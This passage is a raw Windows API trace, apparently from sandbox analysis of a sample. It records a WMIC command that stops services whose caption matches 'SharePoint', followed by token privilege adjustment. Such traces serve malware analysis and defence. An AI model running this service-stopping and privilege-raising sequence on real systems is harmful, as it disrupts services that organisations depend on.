(lpString="EXIT") returned 4 [0111.510] lstrlenW (lpString="SERVICE") returned 7 [0111.510] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0111.510] WbemLocator:IUnknown:AddRef (This=0x2f8050) returned 0x2 [0111.510] lstrlenW (lpString="/") returned 1 [0111.510] lstrlenW (lpString="SERVICE") returned 7 [0111.510] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0111.510] lstrlenW (lpString="-") returned 1 [0111.510] lstrlenW (lpString="SERVICE") returned 7 [0111.510] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0111.510] lstrlenW (lpString="CLASS") returned 5 [0111.511] lstrlenW (lpString="SERVICE") returned 7 [0111.511] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0111.511] lstrlenW (lpString="PATH") returned 4 [0111.511] lstrlenW (lpString="SERVICE") returned 7 [0111.511] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0111.511] lstrlenW (lpString="CONTEXT") returned 7 [0111.511] lstrlenW (lpString="SERVICE") returned 7 [0111.511] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0111.511] lstrlenW (lpString="SERVICE") returned 7 [0111.511] lstrlenW (lpString="SERVICE") returned 7 [0111.511] GetCurrentThreadId () returned 0xe38 [0111.511] ??0CHString@@QAE@XZ () returned 0x26f8c0 [0111.511] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f8050, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x320a98) returned 0x0 [0111.540] CoSetProxyBlanket (pProxy=0x320a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0111.540] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.540] GetCurrentThreadId () returned 0xe38 [0111.540] ??0CHString@@QAE@XZ () returned 0x26f868 [0111.540] SysStringLen (param_1="root\\cli") returned 0x8 [0111.540] SysStringLen (param_1="\\") returned 0x1 [0111.540] SysStringLen (param_1="root\\cli\\") returned 0x9 [0111.540] SysStringLen (param_1="ms_409") returned 0x6 [0111.540] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f8050, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x320d68) returned 0x0 [0111.548] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.548] GetCurrentThreadId () returned 0xe38 [0111.548] ??0CHString@@QAE@XZ () returned 0x26f8c4 [0111.548] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0111.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x698270, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0111.548] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0111.548] SysStringLen (param_1="SERVICE") returned 0x7 [0111.548] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0111.548] SysStringLen (param_1="'") returned 0x1 [0111.548] IWbemServices:GetObject (in: This=0x320a98, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x26f8c0*=0x0, ppCallResult=0x0 | out: ppObject=0x26f8c0*=0x3311b0, ppCallResult=0x0) returned 0x0 [0111.562] IWbemClassObject:Get (in: This=0x3311b0, wszName="Target", lFlags=0, pVal=0x26f898*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f898*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.563] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.563] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.563] IWbemClassObject:Get (in: This=0x3311b0, wszName="PWhere", lFlags=0, pVal=0x26f898*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f898*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.563] lstrlenW (lpString="WHERE Name='#'") returned 14 [0111.563] lstrlenW (lpString="WHERE Name='#'") returned 14 [0111.563] IWbemClassObject:Get (in: This=0x3311b0, wszName="Connection", lFlags=0, pVal=0x26f898*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f898*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x331570, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.563] IUnknown:QueryInterface (in: This=0x331570, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26f8b4 | out: ppvObject=0x26f8b4*=0x331570) returned 0x0 [0111.563] GetCurrentThreadId () returned 0xe38 [0111.563] ??0CHString@@QAE@XZ () returned 0x26f834 [0111.563] IWbemClassObject:Get (in: This=0x331570, wszName="Namespace", lFlags=0, pVal=0x26f818*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f818*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.563] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0111.563] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0111.563] IWbemClassObject:Get (in: This=0x331570, wszName="Locale", lFlags=0, pVal=0x26f818*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3272e4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f818*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.563] lstrlenW (lpString="ms_409") returned 6 [0111.563] lstrlenW (lpString="ms_409") returned 6 [0111.563] IWbemClassObject:Get (in: This=0x331570, wszName="User", lFlags=0, pVal=0x26f818*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3272e4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f818*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.563] IWbemClassObject:Get (in: This=0x331570, wszName="Password", lFlags=0, pVal=0x26f818*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f818*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.564] IWbemClassObject:Get (in: This=0x331570, wszName="Server", lFlags=0, pVal=0x26f818*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f818*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.564] lstrlenW (lpString=".") returned 1 [0111.564] lstrlenW (lpString=".") returned 1 [0111.564] IWbemClassObject:Get (in: This=0x331570, wszName="Authority", lFlags=0, pVal=0x26f818*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3272e4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f818*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.564] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.564] IUnknown:Release (This=0x331570) returned 0x1 [0111.564] GetCurrentThreadId () returned 0xe38 [0111.564] ??0CHString@@QAE@XZ () returned 0x26f824 [0111.564] IWbemClassObject:Get (in: This=0x3311b0, wszName="__RELPATH", lFlags=0, pVal=0x26f80c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f80c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.564] GetCurrentThreadId () returned 0xe38 [0111.564] ??0CHString@@QAE@XZ () returned 0x26f7a0 [0111.564] ??0CHString@@QAE@PBG@Z () returned 0x26f79c [0111.564] ??0CHString@@QAE@ABV0@@Z () returned 0x26f71c [0111.564] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0111.564] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6999f0 [0111.564] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0111.564] ?Left@CHString@@QBE?AV1@H@Z () returned 0x26f714 [0111.565] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x26f718 [0111.565] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x26f79c [0111.565] ??1CHString@@QAE@XZ () returned 0x1 [0111.565] ??1CHString@@QAE@XZ () returned 0x1 [0111.565] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x26f710 [0111.565] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x26f71c [0111.565] ??1CHString@@QAE@XZ () returned 0x1 [0111.565] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x698270 [0111.565] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0111.565] ?Left@CHString@@QBE?AV1@H@Z () returned 0x26f714 [0111.565] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x26f718 [0111.565] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x26f79c [0111.565] ??1CHString@@QAE@XZ () returned 0x1 [0111.565] ??1CHString@@QAE@XZ () returned 0x1 [0111.565] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x26f710 [0111.565] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x26f71c [0111.565] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.565] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0111.565] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.565] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0111.565] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0111.565] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0111.565] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0111.565] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0111.565] SysStringLen (param_1="\"") returned 0x1 [0111.565] IWbemServices:GetObject (in: This=0x320d68, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x26f7ac*=0x0, ppCallResult=0x0 | out: ppObject=0x26f7ac*=0x331950, ppCallResult=0x0) returned 0x0 [0111.567] IWbemClassObject:Get (in: This=0x331950, wszName="Text", lFlags=0, pVal=0x26f778*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f778*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32fee0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x323700, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.567] SafeArrayGetLBound (in: psa=0x32fee0, nDim=0x1, plLbound=0x26f788 | out: plLbound=0x26f788) returned 0x0 [0111.567] SafeArrayGetUBound (in: psa=0x32fee0, nDim=0x1, plUbound=0x26f78c | out: plUbound=0x26f78c) returned 0x0 [0111.567] SafeArrayGetElement (in: psa=0x32fee0, rgIndices=0x26f7a4, pv=0x26f790 | out: pv=0x26f790) returned 0x0 [0111.567] SysStringLen (param_1="Service application management. ") returned 0x20 [0111.567] IUnknown:Release (This=0x331950) returned 0x0 [0111.567] ??1CHString@@QAE@XZ () returned 0x1 [0111.567] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.567] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.567] lstrlenW (lpString="Service application management. ") returned 32 [0111.567] lstrlenW (lpString="Service application management. ") returned 32 [0111.567] IUnknown:Release (This=0x3311b0) returned 0x0 [0111.568] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.568] lstrlenW (lpString="PATH") returned 4 [0111.568] lstrlenW (lpString="WHERE") returned 5 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0111.568] lstrlenW (lpString="WHERE") returned 5 [0111.568] lstrlenW (lpString="WHERE") returned 5 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0111.568] lstrlenW (lpString="/") returned 1 [0111.568] lstrlenW (lpString="caption LIKE '%SharePoint%'") returned 27 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SharePoint%'", cchCount1=27, lpString2="/", cchCount2=1) returned 3 [0111.568] lstrlenW (lpString="-") returned 1 [0111.568] lstrlenW (lpString="caption LIKE '%SharePoint%'") returned 27 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SharePoint%'", cchCount1=27, lpString2="-", cchCount2=1) returned 3 [0111.568] lstrlenW (lpString="caption LIKE '%SharePoint%'") returned 27 [0111.568] lstrlenW (lpString="caption LIKE '%SharePoint%'") returned 27 [0111.568] lstrlenW (lpString="/") returned 1 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0111.568] lstrlenW (lpString="-") returned 1 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] lstrlenW (lpString="GET") returned 3 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0111.568] lstrlenW (lpString="LIST") returned 4 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0111.568] lstrlenW (lpString="SET") returned 3 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0111.568] lstrlenW (lpString="CREATE") returned 6 [0111.568] lstrlenW (lpString="CALL") returned 4 [0111.569] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0111.569] lstrlenW (lpString="CALL") returned 4 [0111.569] lstrlenW (lpString="CALL") returned 4 [0111.569] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0111.569] lstrlenW (lpString="/") returned 1 [0111.569] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.569] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0111.569] lstrlenW (lpString="-") returned 1 [0111.569] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.569] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0111.569] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.569] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.569] GetCurrentThreadId () returned 0xe38 [0111.569] ??0CHString@@QAE@XZ () returned 0x26f02c [0111.569] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0111.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x699a40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0111.569] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0111.569] SysStringLen (param_1="SERVICE") returned 0x7 [0111.569] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0111.569] SysStringLen (param_1="'") returned 0x1 [0111.569] IWbemServices:GetObject (in: This=0x320a98, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x26f008*=0x0, ppCallResult=0x0 | out: ppObject=0x26f008*=0x3311b0, ppCallResult=0x0) returned 0x0 [0111.575] lstrlenW (lpString="CALL") returned 4 [0111.575] lstrlenW (lpString="CALL") returned 4 [0111.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0111.575] IWbemClassObject:Get (in: This=0x3311b0, wszName="Verbs", lFlags=0, pVal=0x26efc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26efc0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32feb0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x32fed0, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.576] SafeArrayGetLBound (in: psa=0x32feb0, nDim=0x1, plLbound=0x26efd0 | out: plLbound=0x26efd0) returned 0x0 [0111.576] SafeArrayGetUBound (in: psa=0x32feb0, nDim=0x1, plUbound=0x26efd8 | out: plUbound=0x26efd8) returned 0x0 [0111.576] SafeArrayGetElement (in: psa=0x32feb0, rgIndices=0x26efe0, pv=0x26f014 | out: pv=0x26f014) returned 0x0 [0111.576] IWbemClassObject:Get (in: This=0x3484b0, wszName="Name", lFlags=0, pVal=0x26efb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26efb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.577] lstrlenW (lpString="StartService") returned 12 [0111.577] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.577] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0111.577] IUnknown:Release (This=0x3484b0) returned 0x1 [0111.577] SafeArrayGetElement (in: psa=0x32feb0, rgIndices=0x26efe0, pv=0x26f014 | out: pv=0x26f014) returned 0x0 [0111.577] IWbemClassObject:Get (in: This=0x3489e0, wszName="Name", lFlags=0, pVal=0x26efb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26efb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.577] lstrlenW (lpString="StopService") returned 11 [0111.577] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.577] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0111.577] GetCurrentThreadId () returned 0xe38 [0111.577] ??0CHString@@QAE@XZ () returned 0x26ee2c [0111.577] IWbemClassObject:Get (in: This=0x3489e0, wszName="Description", lFlags=0, pVal=0x26edfc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26edfc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.577] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.577] IWbemClassObject:Get (in: This=0x3489e0, wszName="Parameters", lFlags=0, pVal=0x26efa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26efa0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.577] IWbemClassObject:Get (in: This=0x3489e0, wszName="VerbType", lFlags=0, pVal=0x26ef38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26ef38*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.577] IWbemClassObject:Get (in: This=0x3489e0, wszName="Derivation", lFlags=0, pVal=0x26ef20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26ef20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.577] lstrlenW (lpString="StopService") returned 11 [0111.577] lstrlenW (lpString="StopService") returned 11 [0111.578] IUnknown:Release (This=0x3489e0) returned 0x1 [0111.578] IUnknown:Release (This=0x3311b0) returned 0x0 [0111.578] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.578] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.578] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.578] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x7e1f75b2 | out: _String="Select", _Context=0x7e1f75b2) returned="Select" [0111.578] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f75b2 | out: _String=0x0, _Context=0x7e1f75b2) returned="*" [0111.578] lstrlenW (lpString="FROM") returned 4 [0111.578] lstrlenW (lpString="*") returned 1 [0111.578] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0111.578] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f75b2 | out: _String=0x0, _Context=0x7e1f75b2) returned="from" [0111.578] lstrlenW (lpString="FROM") returned 4 [0111.578] lstrlenW (lpString="from") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0111.579] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f75b2 | out: _String=0x0, _Context=0x7e1f75b2) returned="Win32_Service" [0111.579] lstrlenW (lpString="SET") returned 3 [0111.579] lstrlenW (lpString="CALL") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0111.579] lstrlenW (lpString="CREATE") returned 6 [0111.579] lstrlenW (lpString="CALL") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0111.579] lstrlenW (lpString="GET") returned 3 [0111.579] lstrlenW (lpString="CALL") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0111.579] lstrlenW (lpString="LIST") returned 4 [0111.579] lstrlenW (lpString="CALL") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0111.579] lstrlenW (lpString="ASSOC") returned 5 [0111.579] lstrlenW (lpString="CALL") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0111.579] WbemLocator:IUnknown:AddRef (This=0x2f8050) returned 0x3 [0111.579] lstrlenW (lpString="") returned 0 [0111.579] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0111.579] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.579] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.579] GetCurrentThreadId () returned 0xe38 [0111.579] GetCurrentProcess () returned 0xffffffff [0111.579] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x26f930 | out: TokenHandle=0x26f930*=0x270) returned 1 [0111.579] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f92c | out: TokenInformation=0x0, ReturnLength=0x26f92c) returned 0 [0111.579] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x699b70, TokenInformationLength=0x118, ReturnLength=0x26f92c | out: TokenInformation=0x699b70, ReturnLength=0x26f92c) returned 1 [0111.579] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x699b70*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), 